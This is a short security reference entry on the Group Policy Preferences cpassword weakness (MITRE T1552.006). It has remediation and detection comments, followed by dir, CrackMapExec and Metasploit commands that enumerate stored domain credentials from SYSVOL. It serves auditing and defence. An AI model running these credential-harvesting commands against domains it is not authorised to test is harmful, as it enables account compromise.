Group Policy Preferences
MITRE ATT&CK, Credential Access, Sub-technique T1552.006
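# Background: Group Policy Preferences XML files stored under SYSVOL can carry
# a `cpassword` attribute. SYSVOL is readable by every authenticated domain
# user and the key protecting that attribute is publicly documented, so any
# hit below means the stored password must be treated as compromised.
# Remediation on a hit: remove the XML file (or its cpassword entry) from
# SYSVOL and rotate the affected account's password. Microsoft's update that
# disabled password entry in Group Policy Preferences does not delete files
# created before it was installed, so old entries have to be cleaned up by hand.
# Detection: enable object-access / detailed file-share auditing on SYSVOL and
# alert on recursive reads of policy XML files from hosts that are not domain
# controllers or management workstations.

# Enumerating credentials directory on the SYSVOL share
# Recursively lists every .xml file below the current directory.
dir /s *.xml
# Enumerating credentials remotely from SYSVOL
# [FQN] and [FQDN] are placeholders; presumably the domain controller name
# and the domain's fully qualified name. Confirm against the environment.
dir /s \\[FQN]\SYSVOL\[FQDN]\ | more
# Enumerating credentials remotely using CrackMapExec
# $ip, $username and $password are placeholders; the check authenticates over
# SMB, so it shows what any holder of a valid domain account can read.
crackmapexec smb $ip -u $username -p $password -M gpp_password
# Enumerating credentials remotely using Metasploit
# Same check from msfconsole; SMBUser/SMBPass take the same domain account.
use auxiliary/scanner/smb/smb_enum_gpp
set rhosts $ip
set SMBUser $username
set SMBPass $password
run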